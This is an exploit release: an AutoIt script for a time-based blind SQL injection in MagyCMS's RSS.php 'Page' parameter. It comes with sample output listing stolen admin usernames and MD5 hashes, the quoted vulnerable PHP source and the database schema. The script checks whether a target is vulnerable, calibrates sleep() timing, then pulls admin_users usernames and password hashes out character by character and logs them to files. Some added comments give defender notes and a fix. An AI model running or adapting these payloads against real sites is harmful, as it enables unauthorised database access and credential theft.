----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0206
Responce Time: 1077.87990864862 ms.
Need to fetch other: [14] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0206d
Responce Time: 1079.14208898928 ms.
Need to fetch other: [13] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd
Responce Time: 1108.17988076703 ms.
Need to fetch other: [12] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd4
Responce Time: 1164.49911938021 ms.
Need to fetch other: [11] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48
Responce Time: 1100.86175303173 ms.
Need to fetch other: [10] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c
Responce Time: 1083.53360421294 ms.
Need to fetch other: [9] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8
Responce Time: 1094.66155316143 ms.
Need to fetch other: [8] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8e
Responce Time: 1079.25520931559 ms.
Need to fetch other: [7] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee
Responce Time: 1089.64739495061 ms.
Need to fetch other: [6] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee4
Responce Time: 1075.80823227561 ms.
Need to fetch other: [5] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44
Responce Time: 1078.8765208783 ms.
Need to fetch other: [4] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44c
Responce Time: 1110.63264652718 ms.
Need to fetch other: [3] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44ca
Responce Time: 1081.87636987911 ms.
Need to fetch other: [2] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44ca6
Responce Time: 1079.1007891431 ms.
Need to fetch other: [1] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------
[+]     TRUE AT OFFSET [3]    [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd48c8ee44ca6c
Responce Time: 1100.79408534274 ms.
Need to fetch other: [ *NONE* ] symbol(s).
Logging to axa.txt...
----------------------------------------

----------------------------------------

----------------------------------------
Username: [manager] MD5 HASH: [04e8e47e68a7b58594fdcf994c5d490d]
----------------------------------------

----------------------------------------
Username: [root] MD5 HASH: [e10adc3949ba59abbe56e057f20f883e]
----------------------------------------

----------------------------------------
Username: [d] MD5 HASH: [326373da562269316790326c00a9972f]
----------------------------------------

----------------------------------------
Username: [test] MD5 HASH: [74a5d1ffce472f0206dd48c8ee44ca6c]
----------------------------------------

----------------------------------------

----------------------------------------
[+]     Usernames And MD5 passwords saved to : mainlog.txt        [+]
----------------------------------------

----------------------------------------
[+] Exploit Finished!. GooD Luck;) [+]
----------------------------------------
[+] Exit! [+]










--------------------------------------------------------------------
Vulnerable Code Section (the injection point is `$page = $_GET['Page'];` — getCatByPage() and the page lookup after it interpolate `$page` unescaped into `WHERE \`Name\`='$page'`, and unlike the `site` and `lang` parameters, `Page` gets no is_numeric() check; the fix belongs in RSS.php, binding the value as a query parameter rather than relying on magic quotes):
========================== BEGIN ===================================



//magycms/Framework/public/RSS.php?Page=
/*
<?
	// Check if data.inc.php is included
	if(!isset($FRAMEWORK_PATH))
		require_once(dirname(__FILE__)."/../../Admin/Inc/data.inc.php");
	require_once(dirname(__FILE__)."/../Common.php");
	require_once(dirname(__FILE__)."/../Links.php");
	require_once(dirname(__FILE__)."/../URL.php");
	require_once($CMS_ROOTPATH   . 'Admin/Inc/db/adodb.inc.php');

	/**
	 * Returns News Category for page with passed name
	 *
	 * @param string $page
	 * @return int ID of category
	 */
	function getCatByPage($page)
	{
		global $db, $tbl_Pages, $tbl_News_Config, $SITEID;
		// Get Page ID for fetching Category
		$query = "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' AND `site`=$SITEID";
		$hResult = $db->Execute($query);
		if (!$hResult->NumRows())
			return -1;
		$row = $hResult->FetchRow();
		$ID = $row[0];

		// Fetch category form DB;
		$query = "SELECT `Category` FROM $tbl_News_Config WHERE `ID`=$ID AND `site`=$SITEID";
		$hResult = $db->Execute($query);
		if (!$hResult->NumRows())
			return -1;
		$row = $hResult->FetchRow();
		return $row[0];
	}

	//////////////////// Opening database connection ////////////////
	$db = &ADONewConnection($DBType);
	$db->PConnect($DBServer,$DBUserName,$DBPassword,$DBName);
	// Switch to the specified charset
	if($DBType=="mysql") $db->Execute("SET NAMES \"$DBCharset\"");

	///////////////////////// Get Site ID ///////////////////////////
	if (isset($_GET['site'])) {
		$SITEID = $_GET['site'];
		if (!is_numeric($SITEID))
			$SITEID = 1;
	} else {
		$SITEID = 1;
	}

	////////////////// Get site URL from DB /////////////////////////
	$hResult = $db->Execute("SELECT `URL` FROM $tbl_Sites WHERE `ID`=$SITEID");
	$Root_URL = "aaa";
	if ($hResult->NumRows())
	{
		$row = $hResult->FetchRow();
		$Root_URL = $row[0];
	}
	//echo($Root_URL."<br>");

	////////////////// Retrieving Language Prefixes /////////////////
	$Lang_Prefix = array();
	$hpResult = $db->Execute("SELECT `ID`, `Prefix` FROM $tbl_Lang WHERE `site`=$SITEID");
	if($hpResult) {
		for($i = 0; $i < $hpResult->RowCount(); $i++) {
			$apResult = $hpResult->FetchRow();
			$Lang_Prefix[$apResult[0]] = $apResult[1];
		}
	}

	///////////////////////// Determine language ////////////////////
	if (isset($_GET['lang'])) {
		$lang = $_GET['lang'];
		if (!is_numeric($lang))
			$lang = GetSiteSetting('Default_lang');
	} else {
		$lang = GetSiteSetting('Default_lang');
	}

	///////////////////////// Determine news Page and Category //////
	$cat = -1;
	$page = "";
	if (isset($_GET['Page'])) {
		$page = $_GET['Page'];
		$cat = getCatByPage($page);
	}

	//////////////////// Get Page information if such exists ////////
	$title = "News";
	$text = "";
	if ($page != "")
	{
		$pQuery = "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' AND `site`=$SITEID";
		$hResult = $db->Execute($pQuery);
		if (!$hResult->NumRows())
			return -1;
		$row = $hResult->FetchRow();
		$ID = $row[0];

		// Fetch Title and Text form DB;
		$pQuery  = "SELECT Title, Text
					FROM $tbl_News_Config AS s INNER JOIN $tbl_News_Config_Data AS d ON s.ID = d.ID
					WHERE s.ID=$ID AND d.language=$lang AND site=$SITEID";
		$hResult = $db->Execute($pQuery);
		if ($hResult->NumRows())
		{
			$row = $hResult->FetchRow();
			$title = $row[0];
			$text = $row[1];
		}
	}
	// Construct link to News page
	$mainLink = ($page == "") ? "" : $Root_URL.CLink::construct($page, $lang);

	///////////////////////// GET NEWS //////////////////////////////
	if ($cat == -1)
		$mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date`
					  FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID`
					  WHERE d.language=$lang AND s.`site`=$SITEID";
	else
		$mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date`
					  FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID`
					  WHERE d.language=$lang AND s.`site`=$SITEID AND s.`Category`=$cat";

	$hResult = $db->Execute($mainQuery);
	// check if there is something to echo
	if (!$hResult->NumRows())
		die();

	///////////////////////// Echo News in RSS //////////////////////
	CRSS::echoHeader($title, $mainLink, $text, getdate(), $Lang_Prefix[$lang]);
	for ($i = 0; $i < $hResult->NumRows(); $i++)
	{
		$row = $hResult->FetchRow();
		$today = date("Y-m-d H:i:s");
		$startDate = $row[4];
		$endDate = $row[5];
		$startDateIsOK = (substr($startDate, 0, 10) == "0000-00-00" || $today >= $startDate);
		$endDateIsOK   = (substr($endDate,   0, 10) == "0000-00-00" || $today <= $endDate);
		if ( $startDateIsOK && $endDateIsOK )
		{
			$link = $Root_URL.CURL::getFormattedURL(CLink::construct($page, $lang), "id", "{$row[0]}");
			CRSS::echoItem($row[2], $link, $link, $row[1], $row[3]);
		}
	}
	CRSS::echoFooter();
?>

<?
class CRSS {
		public static function echoHeader ($title, $link, $desc, $lastBD, $lang)
		{
			// send XML header
			header('Content-Type: application/rss+xml; charset=utf-8');
			// echo XML header
			echo('<?xml version="1.0" encoding="utf-8"?>');
			// echo RSS opening tags
			echo('<rss version="2.0"><channel>\n');

			if ($title != "")	echo ("<title>$title</title>\n");
			if ($link != "")	echo ("<link>$link</link>\n");
			if ($desc != "")	echo ("<description>$desc</description>\n");
			if ($lastBD != "")	echo ("<lastBuildDate>$lastBD Mon, 12 Sep 2005 18:37:00 GMT</lastBuildDate>\n");
			if ($lang != "")	echo ("<language>$lang en-us</language>\n");
		}

		public static function echoFooter ()
		{
			// echo RSS closing tags
			echo('</channel></rss>');
		}

		public static function echoItem($title, $link, $guid, $pubDate, $desc)
		{
			// Strip undesired characters from description
			$desc = ereg_replace("&[^;]*;", "", $desc);
			$desc = strip_tags($desc);

			// Turn Published date into RFC format
			$time = strtotime($pubDate);
			$pubDate = gmdate("r", $time);

			// Echo the item
			echo ("<item>\n");
			if ($title != "")	echo ("<title>$title</title>\n");
			if ($link != "")	echo ("<link>$link</link>\n");
			if ($guid != "")	echo ("<guid>$guid</guid>\n");
			if ($pubDate != "")	echo ("<pubDate>$pubDate</pubDate>\n");
			if ($desc != "")	echo ("<description>$desc</description>\n");
			echo ("</item>\n");
		}
	}
?>



*/

========================= END OF VULNERABLE CODE SECTION ===========================




mysql> show tables \g
+-------------------------+
| Tables_in_SNIP_SNIP_SNIP|
+-------------------------+
| admin_menus             |
| admin_menus_category    |
| admin_menus_permissions |
| admin_users             |
| banner_categories       |
| banners                 |
| banners_data            |
| banners_struct          |
| cms_languages           |
| cms_messages_categories |
| cms_messages_data       |
| cms_messages_struct     |
| cms_settings            |
| core_messages           |
| counter                 |
+-------------------------+
15 rows in set (0.00 sec)

mysql> explain admin_users \g
+----------+------------------+------+-----+---------+----------------+
| Field    | Type             | Null | Key | Default | Extra          |
+----------+------------------+------+-----+---------+----------------+
| ID       | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| Username | varchar(100)     | YES  |     | 0       |                |
| Password | varchar(100)     | YES  |     | 0       |                |
| GUID     | varchar(32)      | YES  |     | 0       |                |
| Level    | int(10) unsigned | YES  | MUL | 0       |                |
| Name     | varchar(100)     | YES  |     | 0       |                |
| Email    | varchar(45)      | YES  |     | 0       |                |
| MID      | int(10) unsigned | YES  |     | 0       |                |
+----------+------------------+------+-----+---------+----------------+
8 rows in set (0.00 sec)



*************************************************

A  R  E       Y   O   U       R   E   A   D  Y?
LETS GOOOOOOOOOOOOOOOOOOOOOOOOOOO!

*************************************************

#ce

; Script-level state shared with getusername() / MD5EDPASSWORD():
;   $USERNAMES_IN_ARRAY     - usernames recovered by getusername(), split on @CRLF
;   $MD5HASHSTRINGSIN_ARRAY - NOTE(review): declared here but never referenced; MD5EDPASSWORD()
;                             assigns and reads $MD5HASHSTRINGS_IN_ARRAY (with an underscore),
;                             which presumably ends up local to that function - confirm.
;   $dd                     - accumulated "Username: [...] MD5 HASH: [...]" report text
Global $USERNAMES_IN_ARRAY,$MD5HASHSTRINGSIN_ARRAY,$dd



;//  COMMAND LINE //
; Entry point of the console tool: exactly one positional argument, the base URL of the
; site. Without an argument a usage dialog is shown (the script is compiled as CUI, see
; the wrapper directives at the top of the file) and the process exits.
if $CmdLine[0]=0 Then
	MsgBox(64,"","This is a console application." & @CRLF & "Usage: " & @CRLF & @ScriptName &   ' http://targetsite.tld')
Exit
EndIf
$host=$CmdLine[1]

; An empty first argument is rejected separately from "no argument".
if $host='' Then
ConsoleWrite(@CRLF & '[+] Empty Command Line Argument? WTF? [+]' & @CRLF)
Exit
EndIf



ConsoleWrite(@CRLF)
; Banner: a 54-column '#' rule above and below three fixed-width lines.
$hellomsg= _StringRepeat('#',54) & @CRLF
$allmsg=$hellomsg &  '# MagyCMS v2.0.1121 BETA Blind SQL Injection Exploit #' & @CRLF & _
'#         Exploitation technique: Time Based         #'  & @CRLF & _
'#             Author: AkaStep & BOT_25               #' & @CRLF & _
$hellomsg;

ConsoleWrite($allmsg);

; Fixed User-Agent applied before every _INetGetSource() call below (HttpSetUserAgent is
; re-issued before each request rather than once).
$useragent='Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1';

#cs
First checking is here any internet connection?
#ce

; $separator is the 40-dash rule used by every status line and log entry in the script.
$separator=@CRLF & _StringRepeat('-',40) & @CRLF;
ConsoleWrite($separator & '[+]  Verifying your internet connection.... Please Wait...[+] ' & $separator)
Sleep(1500)
$hcheckconnectionstatus='http://packetstormsecurity.org';// 100% TODD will kill me ASAP for this xD)

; Connectivity check: the fetched body is discarded, only @error matters.
HttpSetUserAgent($useragent)
$is_offline_or_online=_INetGetSource($hcheckconnectionstatus,True);
if @error Then
	ConsoleWrite($separator & "[+] Sorry Dude! It seems your machine is offline. [+] " & @CRLF & "[+]       Can't continue...Exit. [+] " & $separator);
	Exit
	EndIf

ConsoleWrite($separator & '[+]  Inet Connection is OK .... [+] ' & $separator)
; Injection point: the `Page` query parameter of RSS.php. In the PHP excerpt quoted in the
; header comment, $_GET['Page'] is interpolated unescaped into a WHERE clause; $target is
; the URL prefix every payload below is appended to.
$target=$host & "/magycms/Framework/public/RSS.php?Page="
;// Vulnerable versions of magycms always panics here by exposing following message to public.
; Defender note: this fingerprint works only while PHP fatal errors are echoed to the
; client. Hiding them (display_errors=Off) removes the fingerprint, not the injection -
; the remediation is to bind the Page value as a query parameter in RSS.php.
$isvulnerable='Call to a member function NumRows() on a non-object';// Peace of Blah Blah Stuff :P

$possiblevals='';//initializing of variable...


; Candidate characters for usernames: Chr(Asc("A")+28) .. Chr(Asc("A")+61), i.e. ASCII
; 93..126 (']' '^' '_' '`' 'a'..'z' '{' '|' '}' '~'), one per line; the digits 0-9 are
; appended further down. Every entry is @CRLF-terminated, so the StringSplit() below
; yields a trailing empty element - the consumers loop to UBound()-2 for that reason.
$forusernames='';// initializing it too...
for $i=28 to 61
$forusernames&=Chr(Asc("A")+$i) & @CRLF

Next


; Candidate characters for the password hash: the digits first ...
for $i=0 To 9

$possiblevals&=$i & @CRLF
; nums from 0 1 2 3 4 5 6 7 8 up to 9

	Next
	; then alphas from  a  b  c  d  e  up to f
; ... the digits are also appended to the username set before the hex letters are added.
$forusernames&=$possiblevals;

$possiblevals&='a' & @CRLF & 'b' & @CRLF & 'c' & @CRLF & 'd' & @CRLF & 'e' & @CRLF & 'f' & @CRLF

; $array: 16 lower-case hex digits (+ trailing empty element) - used by MD5EDPASSWORD().
$array=StringSplit($possiblevals,@CRLF,3)

; $bruteusernames: 44 username candidates (+ trailing empty element) - used by getusername().
$bruteusernames=StringSplit($forusernames,@CRLF,3);

$i='';//reset.

; Vulnerability probe: a single unbalanced quote and a substring search for the PHP fatal
; error text above. $true ('vulnerable' / 'not vulnerable') is read again in
; MD5EDPASSWORD(); nothing else in the script branches on it.
ConsoleWrite($separator & '[+] Verifying is Target Site Vulnerable? Please wait...[+]' & $separator);
$maybe=_INetGetSource($target & "'",TRUE) ;//verifying...Is target site vulnerable?
if StringInStr($maybe,$isvulnerable,0) Then
	$true='vulnerable'; // GPC=OFF
ConsoleWrite($separator & '[+]        Reply from target site:           [+]' & @CRLF  & $separator & '[+] - - - -  * Vulnerable! * - - - -   .     [+]' & $separator & @CRLF & _
'[+] Trying to get average value for sleep(1) if condition is TRUE...[+]' & @CRLF & $separator & '[+]               Please wait...             [+] ' & $separator & @CRLF);

    ; NOTE(review): assigned but never read anywhere in the script.
    $additionalchecking_needed='false';

	;// Will check 3 times (with TRUE condition) to get optimal avg value.

;//////////////////// Responce time when condition is TRUE //////////////

; Calibration: three requests whose injected condition is always true (8='8' -> sleep(1))
; measure how long a "true" answer takes over this connection. $docalcavg (the mean, in
; ms) is the only calibration value used later: both extraction functions treat a response
; as "true" when it takes at least 0.8 * $docalcavg.
; Defender note: every request from here on carries a literal quote and "sleep(1)" in the
; Page parameter of RSS.php and, on a true branch, adds about one second of latency - both
; are straightforward web-log / WAF signatures for this activity.
local $docalc;
for $i=1 to 3


$checkfirsttime=TimerInit();

HttpSetUserAgent($useragent);
_INetGetSource($target & "' or (select if(8='8',sleep(1),0))-- AnD 9='9",True);

$rtime=TimerDiff($checkfirsttime);

$docalc+=$rtime;
	Next
$checkfirsttime='';
$rtime='';
$i='';
$docalcavg=Int($docalc/3);//avg value for sleep(1).
$docalc='';
ConsoleWrite($separator & '[+] AVG sleep timeout FOR TRUE CONDITION IS: ' & $docalcavg & ' ms [+]' & $separator);

;////////////// EOF TRUE CONDITION CHECKING ///////////////////////////

;////////////////////// WITH FALSE CONDITION ///////////////////////////

; Same measurement with an always-false condition (8='index.php'). The result is only
; printed - $avgfalsecondition is not referenced after this - so it serves as a sanity
; check for the operator, not as a threshold.

for $i=1 to 3


$checkfirsttime=TimerInit();
HttpSetUserAgent($useragent);
_INetGetSource($target & "' or (select if(8='index.php',sleep(1),0))-- AnD 9='9",True);


$rtime=TimerDiff($checkfirsttime);


$docalc+=$rtime;


	Next
$checkfirsttime='';
$rtime='';
$i='';


$avgfalsecondition=Int($docalc/3);
$docalc='';

ConsoleWrite($separator & '[+] AVG sleep timeout FOR FALSE CONDITION IS:  ' & $avgfalsecondition & ' ms [+] ' &  $separator);

;//////////////// END OF FALSE CONDITION ///////////////////////////////

; getusername() calls MD5EDPASSWORD(), which ends the process with Exit; control does not
; come back here.
getusername();// Fetch usernames Baby)//

Else
	$true='not vulnerable'; //GPC =ON ?
	ConsoleWrite($separator & '[+] Target Site is NOT vulnerable:( .Exit. [+]' & $separator)
	;// Lazy to verify it using another technique.

	Exit

EndIf




Func getusername()
; Recovers up to six rows of admin_users.Username (rows 0..5 via "limit 1 offset $x"),
; one character position at a time, by timing the injected
; "if(substr(Username,pos,1)='c',sleep(1),0)" for every candidate c in $bruteusernames.
; Reads script-level state: $target, $useragent, $bruteusernames, $docalcavg, $separator.
; Writes the global $USERNAMES_IN_ARRAY (one element per row, plus a trailing empty one
; from the final @CRLF). Side effects: console output, appends to axa.txt, and finally a
; call to MD5EDPASSWORD(), which ends the process with Exit - this function never returns.
;//Brain f****cking
; NOTE(review): $oldoffset is never used.
Local $oldoffset=0
$USERNAMES='';

ConsoleWrite($separator & '[+] Getting To Fetch Username(s) from table... Please wait... [+] ' & $separator)
; $usernamen - characters recovered so far for the current row
; $tyi       - 1-based character position within the current username (1..20)
; $x         - row offset passed to LIMIT ... OFFSET
; $stopat    - count of do-loop iterations (one per character position)
$usernamen='';
$tyi=0;
$x=0;
$stopat=0;


do
$tyi+=1
$stopat+=1

	; Twenty positions are examined per row. After position 20 the accumulated name is
	; committed (even when empty, so $USERNAMES always holds one line per row) and the
	; row offset advances.
	if $tyi=21 Then
		$tyi=1;

		$x+=1
		$USERNAMES&=$usernamen & @CRLF




$usernamen='';//reset
	EndIf


$limitval= ' limit 1 offset '  & $x


; NOTE(review): $stopat grows once per position, so it reaches only ~121 before
; "until $x=6" fires; the 5160 bound (6 rows x 20 positions x 43 candidates) does not
; appear to bind - it counts requests, the variable counts positions.
if  $x<6 and $stopat<=5160 Then

; Index 0 (']') and the trailing empty element of $bruteusernames are skipped.
for $q=1 To  UBound($bruteusernames) - 2



; NOTE(review): the payload ends with @CRLF, which is handed to _INetGetSource() as part
; of the URL - confirm that is intended and not a leftover from the log format.
$fetch_username=$target & "' or (select if(substr(Username," & $tyi & ",1)='" & $bruteusernames[$q] &  "',sleep(1),0) from admin_users" &$limitval & ")-- AnD 4='4" & @CRLF


$timer=TimerInit();

HttpSetUserAgent($useragent);
$inethandle=_INetGetSource($fetch_username,True)

$diftime=TimerDiff($timer);

; A response taking at least 80% of the calibrated TRUE-condition average counts as a
; match. Positions with no match contribute nothing; every candidate that matches is
; appended (the loop does not stop at the first hit).
if ($diftime/$docalcavg)>=0.8 Then


$usernamen&=$bruteusernames[$q]



ConsoleWrite('[+] TRUE AT OFFSET [' & $x & '] Currently : [' & $usernamen & ']. Responce Time: ' & $diftime & ' ms.  Logging to axa.txt... [+]' & @CRLF);



; axa.txt receives the full request URL for every hit (appended, never truncated).
FileWrite('axa.txt',$separator & @CRLF & '[+] TRUE AT OFFSET[' & $x & ']' & @CRLF & $usernamen & @CRLF & 'Current Payload: ' & $fetch_username & @CRLF &'Responce Time: ' & $diftime & ' ms ' & @CRLF & $separator)



EndIf
$timer='';
$inethandle='';
$diftime='';

Next

;//
EndIf



until $x=6

$USERNAMES_IN_ARRAY=StringSplit($USERNAMES,@CRLF,3);

; debug ok _ArrayDisplay($USERNAMES_IN_ARRAY);

; Report: one line per non-empty row, $y counts them. NOTE(review): AutoIt gives Not a
; higher precedence than =, so this condition parses as (Not $elem) = ''; it behaves as
; intended in practice but reads differently from what is written - confirm.
$y='';
for $i=0 to UBound($USERNAMES_IN_ARRAY) - 1
	if Not $USERNAMES_IN_ARRAY[$i]='' Then
		$y+=1;
	ConsoleWrite($separator & '[#] Username' & $i & ' => [' & $USERNAMES_IN_ARRAY[$i] & ']      [#]' & $separator)



	EndIf

	Next
	$i='';

ConsoleWrite($separator & '*         Total ' & $y & ' users          *' & $separator)
$y='';


ConsoleWrite($separator & '[+] END OF USERNAME FETCHING. PREVIOUS RECORDS ARE COMPLETE USERNAMES [+]' & $separator)

ConsoleWrite($separator & '[+] GOING TO FETCH MD5 PASSWORDS. This may take few minutes too. Please wait... [+]' & $separator)


;// debug ok! Exit //


; Does not return: MD5EDPASSWORD() calls Exit once it has written mainlog.txt.
MD5EDPASSWORD();//Yeah baby it's time to fetch MD5 passwords.//


EndFunc;=> getusername();



;//Below:Get passwords Function.


Func MD5EDPASSWORD()
; Recovers admin_users.Password for rows 0..5 (assumed to be 32-character MD5 hex strings,
; hence 32 positions x 16 hex candidates), using the same timing comparison as
; getusername(). Pairs each hash with $USERNAMES_IN_ARRAY by index, prints the pairs,
; appends them to mainlog.txt next to the script, beeps three times and calls Exit.
; Reads script-level state: $true, $target, $useragent, $array, $docalcavg, $separator,
; $host, $USERNAMES_IN_ARRAY. Writes the global $dd. Does not return.
Local $stopat;
Local $md5hash;
$MD5HASHSTRINGS='';


; Only runs when the script-level probe set $true='vulnerable'; the other value leads to
; Exit at script level before this function is ever called.
if $true='vulnerable' Then

; $rt is the row offset. The loop runs to 6 although only $rt<6 fetches anything:
; iteration 6 exists to flush the hash gathered during $rt=5 into $MD5HASHSTRINGS.
for $rt=0 To 6


; Commit the previous row's hash. A row with no matches at all adds no line, which
; shifts every later hash one index relative to $USERNAMES_IN_ARRAY (see the pairing
; loop below). NOTE(review): as in getusername(), "not $md5hash=''" parses as
; (Not $md5hash) = '' because of AutoIt operator precedence - confirm.
if not $md5hash='' Then
$MD5HASHSTRINGS&=$md5hash & @CRLF

EndIf

$md5hash='';// we need reset obtained hash here if offset incremented.
$stopat+=1;


; NOTE(review): $stopat increments once per outer iteration (max 7), so the 3072 bound
; (6 rows x 32 positions x 16 candidates) does not appear to bind.
if $rt<6 And $stopat<=3072 Then
for $x=1 to 32 ;// because => strlen('MD5-ED-STRING')=32 . We need loop through it.


; Trailing empty element of $array is skipped.
for $i=0 to UBound($array) - 2

$dynamicpayload="' or (select if(substr(Password," & $x & ",1)='" & $array[$i] & "',sleep(1),0) from admin_users limit 1 offset " & $rt & ")-- AND 5='5"

$doittime=TimerInit();
HttpSetUserAgent($useragent);
$trigger2=_INetGetSource($target & $dynamicpayload,TRUE)

$responcetime=TimerDiff($doittime);

; Same 0.8 * calibrated-TRUE-average threshold as getusername().
if ($responcetime/$docalcavg) >=0.8 Then ;//Sleep()-ed. 99% chance that we got it!

$md5hash&=$array[$i]
; Remaining characters, shown as ' *NONE* ' once 32 have been collected (a number is
; compared with the string '0' here; AutoIt compares numerically in that case).
$howmuchneeded=32-StringLen($md5hash);
if $howmuchneeded='0' then
$howmuchneeded=' *NONE* '
EndIf
$tolog=$separator & '[+]     TRUE AT OFFSET [' & $rt &  ']    [+]' & @CRLF & 'Currently MD5 hash is : ' & $md5hash & @CRLF & 'Responce Time: ' & $responcetime & ' ms.' & @CRLF & 'Need to fetch other: [' & $howmuchneeded & '] symbol(s). ' & @CRLF &  'Logging to axa.txt... ' &  $separator
ConsoleWrite($tolog);
FileWrite('axa.txt',$tolog);
$tolog='';
EndIf

Next


Next
EndIf
Next



;// DISPLAYING PLUS SAVING TO MAINLOG.TXT
; NOTE(review): the script-level Global declares $MD5HASHSTRINGSIN_ARRAY (no underscore),
; so this name is created on assignment here and is presumably local to this function.
$MD5HASHSTRINGS_IN_ARRAY=StringSplit($MD5HASHSTRINGS,@CRLF,3);




; Pair usernames with hashes positionally. NOTE(review): if $MD5HASHSTRINGS_IN_ARRAY has
; fewer elements than $USERNAMES_IN_ARRAY (a row with no hash matches, see above), the
; index $i can run past its end - presumably a runtime subscript error; confirm.
for $i=0 To UBound($USERNAMES_IN_ARRAY) - 2

if Not $USERNAMES_IN_ARRAY[$i]='' and Not $MD5HASHSTRINGS_IN_ARRAY[$i]='' Then

$dd&=$separator & 'Username: [' & $USERNAMES_IN_ARRAY[$i] & '] MD5 HASH: [' & $MD5HASHSTRINGS_IN_ARRAY[$i] &  ']' & $separator
EndIf


Next



ConsoleWrite($separator & $dd & $separator)

; mainlog.txt is appended to (FileWrite does not truncate), one "Target Site:" block per run.
FileWrite(@ScriptDir & "\mainlog.txt",$separator & 'Target Site: ' & $host & @CRLF & $dd & @CRLF)
ConsoleWrite($separator & '[+]     Usernames And MD5 passwords saved to : mainlog.txt        [+]' & $separator)




; Three audible beeps, one second apart, to signal completion.
for $i=0 to 2
	Sleep(1000);
Beep(200,300);

Next


ConsoleWrite($separator & '[+] Exploit Finished!. GooD Luck;) [+]' & $separator)




ConsoleWrite('[+] Exit! [+]');
; Terminates the process here; neither getusername() nor the script body resumes.
Exit;
EndIf
EndFunc;=> MD5EDPASSWORD();



#cs

That's All!


********************* AZERBAIJAN BLACK HATZ***********************************
Of course we never forget our friends so, A BIG RESPECTS+THANKS TO ALL:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
      *Especially to my bro CAMOUFL4G3.*
===========================================================

Thanks + Respect to all friends!

/AkaStep & BOT_25



#ce